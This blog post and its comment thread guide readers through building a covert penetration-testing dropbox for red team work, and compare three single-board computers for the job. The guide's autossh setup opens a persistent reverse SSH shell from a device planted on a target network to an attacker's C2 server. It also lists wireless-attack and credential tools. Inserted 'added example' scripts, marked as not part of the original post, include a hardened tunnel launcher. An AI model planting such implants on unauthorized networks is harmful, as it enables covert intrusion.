How to Build Your Own Penetration Testing Drop Box
Beau Bullock
TL;DR
I compared three single-board computers (SBC) against each other with a specific goal of finding which one would serve best as a “penetration testing dropbox”, and maintain an overall price of around $110. Spoiler Alert: At the time I tested these Hardkernel’s ODROID-C2 absolutely destroyed the competition in this space. If you want to skip the SBC comparison and jump right to building your own pentest dropbox you can find the instructions below and also here.
Overview
A few weeks ago I was scheduled for an upcoming Red Team exercise for a retail organization. In preparation for that assessment, I started gathering all the gear I might need to properly infiltrate the organization, and gain access to their network. Social engineering attacks were explicitly removed from the scope for this engagement. This meant I wasn’t going to be able to ask any employees to plug in USB devices, let me in certain rooms, or allow me to “check my email” on their terminals (yes this works).
Essentially, what we were left with at that point was physical attacks. Could I get access to a terminal left unlocked and perform an HID-based (think Rubber Ducky) attack? If the system wasn’t unlocked, perhaps a USB-Ethernet adapter (like the LAN Turtle) could be placed in line with the system to give me a remote shell to work from. Even if I could get physical access, without any prior knowledge of the network’s egress filtering setup, was I going to be able to get a shell out of the network? So this led me down the path of building a pentest dropbox that I could place on a network, command over a wireless adapter, have automatically SSH out of the network, and that would just be an all-around pentesting box.
Some Device Requirements
Looking into the available options already out there it is very clear that I could either spend over $1,000 to buy something that did what I needed it to do or try to build one comparable for significantly cheaper. So I set some very specific goals of what I wanted this device to do. Here they are:
- Device has to be relatively unnoticeable in size (could be plugged in under a desk unnoticed)
- Has to be able to be controlled over a wireless interface (bonus points if multiple wireless interfaces can be used so wireless management and wireless attacks can happen concurrently)
- Persistent reverse SSH tunnel to a command and control server
- Fully functional pentesting OS (not just a shell to route attacks through)
- Decent storage space (32-64GB)
- Actually be a usable pentesting box that is not sluggish due to hardware restrictions
- Cost around $110 total to build
A Look At the Hardware
I bought three of the most popular single-board computers (SBC) to try to find out which one would be the perfect fit for a pentest dropbox that could accomplish my goals. The devices I put to the test are as follows:
- Raspberry Pi 3 Model B
- BeagleBone Black
- Hardkernel ODROID-C2
Let’s take a look at the hardware specifications of these devices first.
Given the chart above, the ODROID-C2 has the others beat in the Processor, GPU, RAM, Ethernet speed, and Video categories, not to mention the ability to install an eMMC storage module instead of running off of a microSD card. The BeagleBone Black (BBB) has 4GB of onboard flash storage, and more I/O and peripheral options. The Pi 3 does have a built-in Wireless adapter and costs less than the C2 or BBB. Even though the scale was already tipping in the direction of the ODROID-C2 I still gave each device equal treatment in terms of testing them out as pentest drop boxes.
In each case, I bought additional items to complete each system. I found relatively inexpensive cases for the boards, power supplies, storage cards, and wireless adapters where necessary. The BBB and Pi 3 only support the ability to use a microSD card as storage where the ODROID-C2 supports microSD and eMMC. So in the case of the ODROID-C2, I actually tested both storage mediums.
Operating System
I’m a fan of Kali Linux. I use it on pretty much every pentest I perform. Along with the desktop versions of their distribution they also provide images for a number of ARM devices. Each of the devices I compared has Kali images available for them here.
One could definitely substitute a distribution of choice for their own pentest dropbox but I found Kali very easy to install, and familiar given my history with it. In each case, it’s as simple as writing the image file to an external storage medium like a microSD or in the case of the ODROID-C2 an eMMC module then attaching it to the device and booting it up.
Wireless
The Raspberry Pi 3 conveniently has a built-in wireless card. The problem with it is that it doesn’t support monitor mode or packet injection. While this card can still be used as an access point, which satisfies the goal of managing the device over WiFi, it is unable to perform any wireless attacks.
I found this relatively inexpensive ($11.99) wireless adapter that does everything I would want it to. This adapter has an RT5370 chipset that supports monitor mode and worked perfectly when injecting packets with Aireplay-ng.
Neither the BBB nor the C2 includes wireless chips on the devices themselves so a USB wireless adapter was required for them. I used the above adapter along with Hostapd to set up an access point (I include a full walkthrough on setting this up at the end) I could connect to in order to manage the device without physically being connected to it. This adapter works with the Pi 3 as well. If you want to perform any wireless attacks with the dropbox, and opt for the Pi 3, I recommend this adapter.
Cases and Overall Look
For the BeagleBone Black, I bought this black case. I noticed that the device was heating up a bit during heavy testing. For the other two devices, I opted for a case that included a case fan.
The ODROID-C2 actually doesn’t have very many options available in terms of cases. However, the ODROID-C2 is almost an exact replica of the Raspberry Pi 3 in terms of where ports are located on the device. So pretty much any Pi 3 case should work for it (with one small exception that you will see momentarily). For both the Pi 3 and the ODROID-C2 I used this Performance Pro Case. This case includes a case fan that is powered by two of the GPIO pins located on the boards.
There is one problem that comes from using a Raspberry Pi case for an ODROID-C2: the power supply socket is the only thing that doesn’t match up perfectly. This is a problem that can easily be solved with a drill.
Total Hardware Costs
I decided to test each device with a 64 GB SanDisk Extreme MicroSDXC UHS-1 card. This storage amount was something that I personally wanted to have but if you don’t need as much storage you can definitely drop the total price by going with lower storage space. I also tested out an eMMC module for the ODROID-C2. I only tested a 32 GB eMMC module due to the cost being so much higher. You will see later on in this post that the cost is very much worth it. Again, the wireless card for the Pi 3 is not completely necessary due to the built-in card but if you want to do any wireless attacks you will need an adapter.
Field Testing the Drop Boxes
After getting each device setup with my initial requirements of what I wanted from a pentest dropbox I performed a few tests to compare how well they actually function as a dropbox. I first tested how fast each system could boot up. To do this I timed from the moment I hit enter after typing ‘reboot’ in a terminal to the moment when the login screen was displayed. I also tested how fast from a reboot I could load the Metasploit console. The ODROID-C2 took 1 minute and 14 seconds from reboot to Metasploit console. This was a full minute faster than the Raspberry Pi 3, and over 2 minutes faster than the BeagleBone Black.
Next, I baselined password cracking speeds on the devices. Granted, I don’t think I would ever have a need or really want to do any cracking on these. I have a decent cracking rig I could always send hashes to. This was more a test of the processors in each of them so that I could have a number to visually see which one was operating faster. To do this I simply used the baseline test functionality from John the Ripper (./john --test). Again, the ODROID-C2 came out on top, and by a lot.
I performed port scans with each device using Nmap against a router. I tested both the standard Nmap command without any flags and also with the Service Detection flag (-sV). There really wasn’t a huge difference between the devices during this test. They all took around 2 seconds for the basic scan and around 2 minutes and 23 seconds for the Service Detection.
The last comparison I did between the devices was to see how fast each of them could write data to storage, and read data from storage. To do this I first used ‘dd’ to write 1 GB of data to disk. Then, I cleared the Linux cache and read the file again using ‘dd’. I also tested buffered and cached reads using ‘hdparm’. When it comes to disk reads and writes this is where the ODROID-C2 absolutely destroys the competition. The ODROID-C2 with the eMMC module is about 15 times faster at writing to disk than the Raspberry Pi 3 with microSD and about 9 times faster at reading data. Even the ODROID-C2 with microSD is still about 2 times faster than the Raspberry Pi 3.
For testing write speeds I used this:
sync; dd if=/dev/zero of=tempfile bs=1M count=1024; sync
For testing read speeds I used this:
/sbin/sysctl -w vm.drop_caches=3
dd if=tempfile of=/dev/null bs=1M count=1024
For testing buffered and cached reads I used this:
hdparm -Tt /dev/mmcblk0
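The three commands above are the whole measurement; the following is an added example, not from the original post, that wraps the same dd write, drop_caches and dd read sequence in a function with a configurable size and turns the timings into MB/s. It assumes GNU coreutils (date +%s%N, dd bs=1M) on a Linux host. The one caveat it handles is the read figure: if the page cache cannot be dropped (not root, or a read-only /proc/sys as in most containers) the read comes from cache and the output says so, because an uncached-looking number in that situation is exactly the mistake the sysctl step exists to avoid.

```shell
#!/bin/bash
# Added example (not part of the original post): dd-based write / cold-read
# benchmark with throughput computed in MB/s. Assumes GNU coreutils on Linux.

# mbps SIZE_MB START_NS END_NS -> throughput in MB/s with one decimal
mbps() {
  awk -v mb="$1" -v a="$2" -v b="$3" \
    'BEGIN { ns = b - a; if (ns < 1) ns = 1; printf "%.1f", mb * 1e9 / ns }'
}

# bench_disk DIR [SIZE_MB]
# Writes SIZE_MB of zeros into DIR, syncs, drops the page cache (root only),
# reads the file back and prints "write=<MB/s> read=<MB/s>[ (cached)]".
# "(cached)" means the cache could not be dropped, so the read never hit
# the medium and the number must not be compared with a cold read.
bench_disk() {
  local dir="$1" mb="${2:-1024}" file t0 t1 w r cached=""
  file="$dir/bench.$$.tmp"

  sync
  t0=$(date +%s%N)
  dd if=/dev/zero of="$file" bs=1M count="$mb" 2>/dev/null || return 1
  sync                       # include the flush to the medium in the write time
  t1=$(date +%s%N)
  w=$(mbps "$mb" "$t0" "$t1")

  # vm.drop_caches=3 frees page cache, dentries and inodes. Needs root and a
  # writable /proc/sys; otherwise mark the read as cached.
  if ! { [ "$(id -u)" -eq 0 ] && sync && echo 3 > /proc/sys/vm/drop_caches; } 2>/dev/null; then
    cached=" (cached)"
  fi

  t0=$(date +%s%N)
  dd if="$file" of=/dev/null bs=1M count="$mb" 2>/dev/null || { rm -f "$file"; return 1; }
  t1=$(date +%s%N)
  r=$(mbps "$mb" "$t0" "$t1")

  rm -f "$file"
  echo "write=${w}MB/s read=${r}MB/s${cached}"
}

# Stand-alone usage: ./bench.sh <dir> [size_mb], e.g. ./bench.sh /root 1024
if [ $# -ge 1 ]; then
  bench_disk "$@"
fi
```

Run it as root on the dropbox with the directory on the eMMC or microSD root partition; the 1 GB default matches the post's count=1024, and a smaller size is useful only for a quick sanity check since small files fit in the controller's own cache.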
Conclusion
The ODROID-C2 was a much faster and stable build as a pentest dropbox. I ended up taking that device with me on the red team engagement, placed it in a location connected to their network and left it up for three days without a hiccup. The wireless interface saved me, as the network I was plugged into wasn’t set up to hand out DHCP addresses to new devices. I had to manually discover what the subnet was and manually set an IP address to use to route my traffic. If I didn’t have the wireless interface the device would have simply been sitting there not able to connect out to my command and control server.
The ODROID-C2 kept an SSH tunnel to my C2 server up after I set up the interface. The device handled multiple Meterpreter sessions perfectly and felt as if I had a very decent penetration testing system on their network. The other devices were usable but for about the same price you can build a much more powerful dropbox.
Below you will find a full walkthrough guide to build an ODROID-C2 pentest dropbox w/ eMMC yourself. But if you read this and already have one of the other devices or just feel like building a dropbox out of one of the other devices, I have written up instructions for each. You can find PDF’s of each write-up here:
- ODROID-C2 w/ eMMC Pentest DropBox Instructions
- ODROID-C2 w/ microSD Pentest DropBox Instructions
- Raspberry Pi 3 Pentest DropBox Instructions
- BeagleBone Black Pentest DropBox Instructions
Without further ado here is the full walkthrough guide for building the ODROID-C2 Pentest DropBox with an eMMC module:
ODROID-C2 w/ eMMC Pentest DropBox Instructions
Hardware Shopping List (links current as of 8/2/2016)
- ODroid-C2 – $41.95
- DC 5V/2A 2.5 mm power adapter – $6.99
- 32 GB eMMC module for ODROID-C2 (make sure the eMMC to MicroSD adapter is selected as an add-on $1) – $42.95
- MicroSD to USB Adapter – $6.99
- RT5370 Chipset Wireless Antenna – $11.99
- Performance Pro Case for RPi – $9.99
Initial Setup of the Kali Image
- Download the Kali ODROID-C2 image from the Kali downloads site here:
- Flash the Kali image to the eMMC.
- For Windows
- Use an eMMC to microSD adapter, then microSD to USB adapter and connect the eMMC to the Windows system.
- On a Windows system unzip the kali-*-odroidc2.img.xz file with 7zip
- Use Win32DiskImager to write the Kali image to the eMMC.
- For Linux
- Use an eMMC to microSD adapter, then microSD to USB Adapter and connect the eMMC to the Linux system.
- Use the dd tool to image the Kali file to the eMMC. (It is very important that you choose the correct storage device here. It is very easy to accidentally wipe out your computer’s hard disk using this command. In the example below I use /dev/sdb but yours may be different, so change accordingly.)
xzcat kali-*-odroidc2.img.xz | dd of=/dev/sdb bs=512k
- Fix eMMC reboot Issue (For some reason the uInitrd file in the boot partition gets corrupted after rebooting. This is a known issue and is documented here: https://github.com/offensive-security/kali-arm-build-scripts/issues/76. The steps below are a workaround that seems to fix this issue for now.)
- While eMMC is still plugged into system copy off the /boot partition (Image, meson64_odroidc2.dtb, and uInitrd).
- Create a “backup” folder in the /boot partition and copy these files there (Image, meson64_odroidc2.dtb, and uInitrd).
- Insert the eMMC card into the ODROID-C2 and boot it up using the power supply, an HDMI cable for display, and keyboard/mouse plugged into the USB ports.
- Login to the Kali Linux distribution with the username of ‘root’ and the password of ‘toor’.
- Mount the boot partition and also make it auto mount on start up using /etc/fstab.
mount /dev/mmcblk0p1 /boot
echo '/dev/mmcblk0p1 /boot auto defaults 0 0' >> /etc/fstab
- Create the backup restore script.
nano /boot/backup/restore.sh
- Copy the following into /boot/backup/restore.sh
#!/bin/bash
cp /boot/backup/* /boot/
- Make the script executable and make sure it runs without error.
chmod 755 /boot/backup/restore.sh
/boot/backup/restore.sh
- Add the script to the rc.local.
nano /etc/rc.local
Add the following line before ‘exit 0’.
/boot/backup/restore.sh
- Plug an Ethernet cable into the ODROID-C2 to provide Internet to the device. The ODROID-C2 should automatically attempt to obtain an IP address via DHCP.
- Change the root password. This can be accomplished by opening up a terminal and typing ‘passwd’ then hitting ‘enter’. Follow the dialog to change the password.
passwd
- Expand the filesystem to cover the entire eMMC. (When the image is flashed to the eMMC it only partitions a portion of the eMMC. You must manually recreate the partition using the fdisk commands below to expand the drive. Run ‘df -H’ before and after to see the difference in the root partition’s available space.)
fdisk /dev/mmcblk0
d                           ### The 'd' option allows us to delete a partition
2                           ### We select partition 2 to be deleted
n                           ### The 'n' option creates a new partition
p                           ### 'p' creates a primary partition
2                           ### Set partition number 2
                            ### Accept the default first sector (the start sector of the disk)
                            ### Accept the default last sector (the end sector of the disk)
w                           ### Use 'w' to write the changes
reboot                      ### Reboot, then log back in
resize2fs /dev/mmcblk0p2    ### Use resize2fs to grow the filesystem into the new partition
- Update and upgrade the Kali distribution.
apt-get update && apt-get upgrade
Setup a WiFi Access Point
- Install hostapd.
apt-get install hostapd
- Create the file /etc/hostapd/hostapd.conf. This can be accomplished with the ‘nano’ command.
nano /etc/hostapd/hostapd.conf
- Copy the following into the hostapd.conf file. Modify the ssid, and wpa_passphrase accordingly.
# Interface configuration
interface=wlan0
ssid=tortugas
channel=1
# WPA configuration
macaddr_acl=0
auth_algs=3
ignore_broadcast_ssid=0
wpa=3
wpa_passphrase=@pirateslife4me@
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP TKIP
rsn_pairwise=CCMP
# Hardware configuration
driver=nl80211
ieee80211n=1
hw_mode=g
- Modify the file /etc/init.d/hostapd.
nano /etc/init.d/hostapd
Find the line:
DAEMON_CONF=
And change it to:
DAEMON_CONF=/etc/hostapd/hostapd.conf
- Install Dnsmasq.
apt-get install dnsmasq
- Edit /etc/dnsmasq.conf.
nano /etc/dnsmasq.conf
Add the following to /etc/dnsmasq.conf (This tells dnsmasq to bind to the wlan0 interface and provide DHCP to clients. The range specified below will hand out IPs in the 172.16.66.50-172.16.66.100 range):
no-resolv
# Interface to bind to
interface=wlan0
bind-interfaces
# Specify start_range,end_range,netmask,lease_time
dhcp-range=172.16.66.50,172.16.66.100,255.255.255.0,12h
- Edit /etc/network/interfaces.
nano /etc/network/interfaces
- Add the following to /etc/network/interfaces (This will specify a static IP of 172.16.66.1 for the wlan0 interface).
auto wlan0
allow-hotplug wlan0
iface wlan0 inet static
    address 172.16.66.1
    netmask 255.255.255.0
At this point plug in the Wireless adapter, and attempt to bring up the interface.
airmon-ng check kill
hostapd /etc/hostapd/hostapd.conf
If there are no errors you should now be able to connect to the SSID with a wireless device.
- Enable hostapd to start on boot.
update-rc.d hostapd enable
- Enable dnsmasq to start on boot. (I had issues with “update-rc.d dnsmasq enable” here because dnsmasq was starting before wlan0 was up and failing to bind to the interface. Instead, I found adding “service dnsmasq start” to /etc/rc.local works.)
nano /etc/rc.local
Add the following line to /etc/rc.local before ‘exit 0’:
service dnsmasq start
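As an added example that is not part of the original post, the following script writes the hostapd.conf and dnsmasq.conf shown above from a few parameters and applies the checks that hostapd and dnsmasq would otherwise only report when the access point fails to come up (WPA-PSK passphrase length of 8 to 63 characters, SSID length, a valid 2.4 GHz channel for hw_mode=g). It deliberately differs from the post's hostapd.conf in two places: wpa=2 with CCMP only, where the post's wpa=3 and "CCMP TKIP" also accept WPA1/TKIP clients, and auth_algs=1 (open system, which is what WPA-PSK uses) instead of auth_algs=3. The file paths are parameters and the SSID, passphrase and DHCP range are placeholders from the post.

```shell
#!/bin/bash
# Added example (not part of the original post): generate the dropbox AP
# configuration with the checks hostapd/dnsmasq would otherwise fail on at
# start-up. Values below are placeholders; paths are caller supplied.

# write_hostapd_conf FILE SSID PASSPHRASE [CHANNEL] [IFACE]
write_hostapd_conf() {
  local file="$1" ssid="$2" pass="$3" channel="${4:-1}" iface="${5:-wlan0}"

  # hostapd rejects WPA-PSK passphrases outside 8..63 characters at start-up.
  if [ "${#pass}" -lt 8 ] || [ "${#pass}" -gt 63 ]; then
    echo "wpa_passphrase must be 8 to 63 characters (got ${#pass})" >&2
    return 1
  fi
  # An SSID is 1..32 bytes.
  if [ "${#ssid}" -lt 1 ] || [ "${#ssid}" -gt 32 ]; then
    echo "ssid must be 1 to 32 characters" >&2
    return 1
  fi
  # hw_mode=g is the 2.4 GHz band: channels 1..14 (1..11 in many regulatory domains).
  case "$channel" in
    [1-9]|1[0-4]) ;;
    *) echo "channel must be 1..14 for hw_mode=g (got $channel)" >&2; return 1 ;;
  esac

  cat > "$file" <<EOF
# Interface configuration
interface=$iface
driver=nl80211
ssid=$ssid
channel=$channel
# Hardware configuration
hw_mode=g
ieee80211n=1
# WPA2-PSK with CCMP only (no WPA1/TKIP fallback)
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
wpa_passphrase=$pass
EOF
}

# write_dnsmasq_conf FILE IFACE RANGE_START RANGE_END NETMASK [LEASE]
write_dnsmasq_conf() {
  local file="$1" iface="$2" start="$3" end="$4" mask="$5" lease="${6:-12h}"
  # Four-field dhcp-range: start,end,netmask,lease-time. bind-interfaces
  # keeps dnsmasq off the wired side of the dropbox.
  cat > "$file" <<EOF
no-resolv
# Interface to bind to
interface=$iface
bind-interfaces
dhcp-range=$start,$end,$mask,$lease
EOF
}

# Stand-alone usage: ./apconf.sh <ssid> <passphrase> [channel]
# (placeholder SSID/passphrase from the post must be changed before deploying)
if [ $# -ge 2 ]; then
  write_hostapd_conf /etc/hostapd/hostapd.conf "$1" "$2" "${3:-1}" &&
  write_dnsmasq_conf /etc/dnsmasq.conf wlan0 172.16.66.50 172.16.66.100 255.255.255.0 12h
fi
```

The checks run before anything is written, so a bad passphrase or channel leaves the previous configuration untouched; after writing, `hostapd -dd /etc/hostapd/hostapd.conf` in the foreground is still the quickest way to see the driver or regulatory errors that a file-level check cannot catch.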
Setup Automatic Reverse SSH Tunnel
This section assumes you have a command and control server accessible on the Internet and that server has SSH enabled on port 22.
- Install ‘autossh’ to use to automatically create an SSH tunnel to a command and control server.
apt-get install autossh
- Generate SSH keys.
ssh-keygen #Leave all of the settings default
- Copy /root/.ssh/id_rsa.pub to the C2 server.
scp /root/.ssh/id_rsa.pub root@<C2 IP Address>:/directory/to/upload/to/
- Append the contents of id_rsa.pub to ~/.ssh/authorized_keys or create this file on the C2 server.
# On C2 server
cat /directory/to/upload/to/id_rsa.pub >> ~/.ssh/authorized_keys
- Test the key-based authentication. If all goes well you should end up logged into the C2 server without the requirement of entering a password.
# On the ODROID-C2
ssh root@<C2 IP address>
- Test ‘autossh’.
autossh -M 11166 -o "PubkeyAuthentication=yes" -o "PasswordAuthentication=no" -i /root/.ssh/id_rsa -R 6667:localhost:22 root@<C2 IP Address>
If all goes well an ssh session should be established, and port 6667 should now be listening on the C2 server. On the C2 server SSH’ing to this port should provide an SSH shell to the ODROID-C2. The -M option (11166) is a monitor port.
- Add the ‘autossh’ command to /etc/rc.local to establish the SSH tunnel at boot.
nano /etc/rc.local
Add the following to /etc/rc.local
autossh -M 11166 -N -f -o "PubkeyAuthentication=yes" -o "PasswordAuthentication=no" -i /root/.ssh/id_rsa -R 6667:localhost:22 root@<C2 IP Address> &
Flag meanings:
-N: Do not execute a remote command (the C2 server is only used to forward the port)
-f: drop into the background
&: Execute this command but do not wait for output or an exit code. If this is not added, your machine might hang at boot.
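The rc.local line above starts autossh unconditionally, so on a network like the one in the Conclusion (no DHCP, eth0 configured by hand later) the first attempt simply fails. The script below is an added example, not from the original post, of a launcher that waits for a default route before calling autossh, and adds OpenSSH options that make a half-dead tunnel restart: ExitOnForwardFailure=yes makes ssh exit (and autossh reconnect) when the C2 server still holds the old listener on port 6667, and ServerAliveInterval/ServerAliveCountMax detect a silently dropped connection. StrictHostKeyChecking=yes relies on the C2 host key already being in /root/.ssh/known_hosts, which the key-test step above takes care of. The C2 host name, ports and key path are placeholders to change; AUTOSSH can be overridden for testing.

```shell
#!/bin/bash
# Added example (not part of the original post): reverse-tunnel launcher for
# /etc/rc.local that waits for connectivity and hardens the ssh options.
# C2_HOST, ports and KEY are placeholders; adjust for your own C2 server.

C2_HOST="${C2_HOST:-c2.example.invalid}"   # placeholder, replace with the C2 address
C2_USER="${C2_USER:-root}"
REMOTE_PORT="${REMOTE_PORT:-6667}"          # port that listens on the C2 server
MONITOR_PORT="${MONITOR_PORT:-11166}"       # autossh -M monitor port
KEY="${KEY:-/root/.ssh/id_rsa}"
AUTOSSH="${AUTOSSH:-autossh}"

# wait_for_default_route [SECONDS]: poll until a default route exists
# (eth0 via DHCP, or the manually configured one). 0 = found, 1 = timed out.
wait_for_default_route() {
  local deadline=$(( $(date +%s) + ${1:-120} ))
  while [ "$(date +%s)" -lt "$deadline" ]; do
    if ip route show default 2>/dev/null | grep -q '^default'; then
      return 0
    fi
    sleep 2
  done
  return 1
}

# tunnel_args: print the autossh argument list, one argument per line,
# so the exact command can be reviewed before it is ever run.
tunnel_args() {
  printf '%s\n' \
    -M "$MONITOR_PORT" \
    -N \
    -o PubkeyAuthentication=yes \
    -o PasswordAuthentication=no \
    -o ExitOnForwardFailure=yes \
    -o ServerAliveInterval=30 \
    -o ServerAliveCountMax=3 \
    -o StrictHostKeyChecking=yes \
    -i "$KEY" \
    -R "${REMOTE_PORT}:localhost:22" \
    "${C2_USER}@${C2_HOST}"
}

# start_tunnel [WAIT_SECONDS]: 2 = key missing, 1 = no route, 0 = launched.
# Backgrounded with & instead of -f so rc.local never blocks on it.
start_tunnel() {
  if [ ! -r "$KEY" ]; then
    echo "private key $KEY is not readable" >&2
    return 2
  fi
  if ! wait_for_default_route "${1:-120}"; then
    echo "no default route after ${1:-120}s, giving up" >&2
    return 1
  fi
  # shellcheck disable=SC2046 -- arguments contain no whitespace
  "$AUTOSSH" $(tunnel_args) &
  return 0
}

# Stand-alone usage from /etc/rc.local: /root/tunnel.sh start
if [ "${1:-}" = "start" ]; then
  start_tunnel 120
fi
```

Because autossh itself restarts ssh, the launcher only needs to get the first attempt right; if the route never appears within the wait the script exits non-zero and rc.local continues, which is also the moment to connect over the wireless AP and configure eth0 by hand as described in the Conclusion.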
Final Touches
Some tools are pre-installed on the Kali ARM image but not many (sqlmap, wireshark, nmap, hydra, john, aircrack-ng are installed by default)
- Install whatever tools you want to have on your dropbox. Here are some to get you started:
apt-get install responder metasploit-framework macchanger voiphopper snmpcheck onesixtyone patator isr-evilgrade creddump screen
- To go into “Wireless attack” mode instead of using the card as an access point follow these instructions:
service hostapd stop
airmon-ng check kill
airmon-ng start wlan0
airodump-ng wlan0mon    ### Or any other wireless attack toolkit...
- Optionally, it is possible to connect a second wireless card to use as the “attack” interface.
Luca
August 3, 2016 @ 7:57 am
Let’s not forget NanoPi NEO ;]
https://pbs.twimg.com/media/CozLIX_WYAAXRd6.jpg
https://pbs.twimg.com/media/CozLSs0WcAALAHY.jpg
Beau
August 4, 2016 @ 12:51 pm
Luca, I’ll check it out. Thanks.
Antoine
August 4, 2016 @ 9:10 am
Super interesting read ! Thanks for sharing…
Just one (stupid) question, you say that “the wireless interface saved” you and that your device was “placed in a location connected to their network”.
It was plugged into the wired network and you used the wireless interface to configure the wired one? Or was everything done through the wireless interface? I’m curious about the context… But I’m probably missing something here, as the n00b I am 😉
Beau
August 4, 2016 @ 12:50 pm
Hey Antoine, thanks for reading! Yes, I used the wireless interface to configure the Ethernet interface. The network was not configured to automatically serve up a DHCP address to my drop box. So, simply plugging the device in meant there was no way it could route the reverse SSH tunnel to the command and control server. After manually configuring the eth0 interface to have an IP on their subnet, and route properly through their default gateway it connected out to my command and control server where I then had full remote access to it. I hope that helps.
Noxferatu
August 26, 2016 @ 1:28 pm
Hey Beau,
To follow up on Antoine’s question… To connect to the wireless interface, did you just lurk within range of the wireless? (And, if so, how was the range with the 2dBi antenna?)
skyfall
August 4, 2016 @ 11:51 pm
The guide was superb. For a few days the idea of building a single-board PC for pentesting had been rolling around in my mind, so I started looking at some single-board PCs available on the market. I came across the Raspberry Pi 3 Model B and thought it was the best of the best, but after reading your guide, which first introduced me to the C2, the C2 set the benchmark for single-board computers.
The sad thing is the C2 is not available in India. I just want to ask you one question: I am going to buy a Raspberry Pi 3 Model B for the same purpose.
Can it fulfill the pentesting requirements as compared to the C2?
Please add a conclusion to the guide on how your overall experience was. It will help people like me decide which one to grab.
Thank you so much.
Keep posting more about this topic, we are waiting.
Beau
August 5, 2016 @ 6:55 am
Hey skyfall, Thanks for the feedback! You mentioned the C2 is not available in India but according to Hardkernel’s website there are a few distributors there. Here’s what I found:
https://www.fabtolab.com/boards/Odroid-Boards
https://www.crazypi.com/ODROID-INDIA?xpage=1&xoffset=1020
Also, the main Hardkernel website will ship worldwide:
http://www.hardkernel.com/main/products/prdt_info.php
To answer your question about whether the Pi 3 could fulfill being a decent pentesting box, the answer is that it depends on how hard you are going to push it. With only 1 GB of RAM you will have to be careful with concurrent processes that are memory heavy. It will definitely hold a few Meterpreter shells, and still allow you to run other Metasploit modules concurrently.
skyfall
August 9, 2016 @ 12:16 am
Yeah, I already checked those out; some of them are out of stock.
I’m thinking I will first try the Raspberry Pi 3 as my first ever single-board computer, and then, once I am used to it, upgrade to the C2.
caffeine
August 5, 2016 @ 12:02 am
Wouldn’t restore.sh be simpler as:
#!/bin/bash
cp /boot/backup/* /boot/
?
Beau
August 5, 2016 @ 6:41 am
Thanks for the comment! Yes, we will update the instructions.
geexter
August 5, 2016 @ 12:34 am
Hi, this is a great read. I loved the way you compared with other SBC along with benchmarks. Odroid released XU4 board, with rich features like USB 3.0 and onboard cooler. What you think about this board?
Beau
August 5, 2016 @ 6:40 am
I think the XU4 is an awesome board. The only reason I didn’t include it in this post was because I was trying to keep the prices relatively close to each other to make a fair comparison. If you want to spend the extra $30 the XU4 definitely would be worth doing this with.
There is another board coming out soon that I am really excited to check out. There are a few different models of “UP boards” that are available for pre-order: http://up-shop.org/4-up-boards.
They have Intel Atom processors. The $129 version has 4 GB of RAM, and a 32 GB eMMC!
Antoine
August 5, 2016 @ 12:58 am
Hi Beau,
Yep, it’s crystal clear now, thanks for your response.
ustayready
August 10, 2016 @ 5:55 pm
Great write-up man! 🙂 Inspired me to grab the XU4. Thanks and well done!
erik
August 15, 2016 @ 2:26 pm
I get all the way up to ‘apt-get upgrade’ but the upgrade fails:
Setting up initramfs-tools (0.125) …
update-initramfs: deferring update (trigger activated)
Processing triggers for initramfs-tools (0.125) …
ln: failed to create hard link ‘/boot/initrd.img-3.14.29.dpkg-bak’ => ‘/boot/initrd.img-3.14.29’: Operation not permitted
update-initramfs: Generating /boot/initrd.img-3.14.29
gzip: stdout: No space left on device
E: mkinitramfs failure cpio 141 gzip 1
update-initramfs: failed for /boot/initrd.img-3.14.29 with 1.
dpkg: error processing package initramfs-tools (–configure):
subprocess installed post-installation script returned error exit status 1
Errors were encountered while processing:
initramfs-tools
E: Sub-process /usr/bin/dpkg returned an error code (1)
please help.. 🙁
Beau
August 15, 2016 @ 5:55 pm
Hey Erik,
I actually ran into a similar issue when I was testing these out, and forgot to document the fix in the instructions. Sorry about that. The update is failing because there’s not enough room in the /boot/ directory (due to the fact that we backed files up there). The fix that worked for me was to simply move the uInitrd and Image files to the /root/ partition somewhere, perform the update, then move them back to the backup directory.
Try this:
mv /boot/backup/uInitrd /boot/backup/Image /root/Desktop/
apt-get update && apt-get upgrade
mv /root/Desktop/uInitrd /root/Desktop/Image /boot/backup/
Let me know if that helps. If so, I’ll update the instructions above.
erik
August 15, 2016 @ 7:01 pm
Thanks, I ended up just moving to a microSD. As a bonus, could you provide some insight into affordable SSH tunnel server hosting? Are there services out there, and if so, who do you recommend?
Beau
August 16, 2016 @ 8:11 am
You can spin up an Amazon EC2 Nano instance very cheaply. The cool thing about Amazon is you are only charged for the uptime of the server. Amazon’s Nano instance currently costs only $0.0065 per hour. So, even if you left it running for the whole month it is still less than $5 a month. Nano instances only have 0.5 GB of RAM and 1 vCPU so they are not ideal for doing much more than being a listener for your drop box, but they will definitely work for that purpose. Alternatively, if you want to spend about $10 a month you can get decent VPSes from either Linode or Digital Ocean. $10 a month at Linode will get you 2 GB of RAM.
Hannes
August 21, 2016 @ 2:46 am
Thanks for the post! Would you mind mentioning some literature/beginner courses for wireless pentesting?
I am relatively new to this area and would like to know some more details on what is possible and how things can be prevented. Thanks a lot!
skyfall
August 22, 2016 @ 10:14 pm
Guys, I am going to buy a Raspberry Pi 3 Model B in two days.
It will be my first single-board computer.
Thank you @Beau for inspiring me. Keep posting more about pentesting with the Raspberry Pi.
namrood
August 28, 2016 @ 10:54 am
Is it possible to use the OTG port as a BadUSB-type device like in NetHunter?
John
September 7, 2016 @ 1:48 pm
Hello, I did a similar project making my own Onion Pi (a slightly tweaked version for the Raspberry Pi 3) and I had a similar idea to do this too with Kali and my Pi 3, but I have been having trouble with getting a second interface running on it (bear in mind this was on Raspbian). I was wondering if you had any advice for me for setting up a second attack interface. I messed with the interfaces file to see if I could set up wlan1 or something but that was unsuccessful. Any advice you can give would be helpful, thank you.
Jon
September 30, 2016 @ 12:45 pm
How do you handle Network Access Control? Does this bypass it?
Beau
September 30, 2016 @ 2:13 pm
Hey Jon,
As of right now no it doesn’t bypass NAC. I use a Beaglebone Black with this to bypass NAC for now: https://github.com/Warpnet/BitM
http://shellsherpa.nl/nac-bypass-8021x-or-beagle-in-the-middle
Looking to port it over to this dropbox in the near future.
Stephen
October 4, 2016 @ 9:59 am
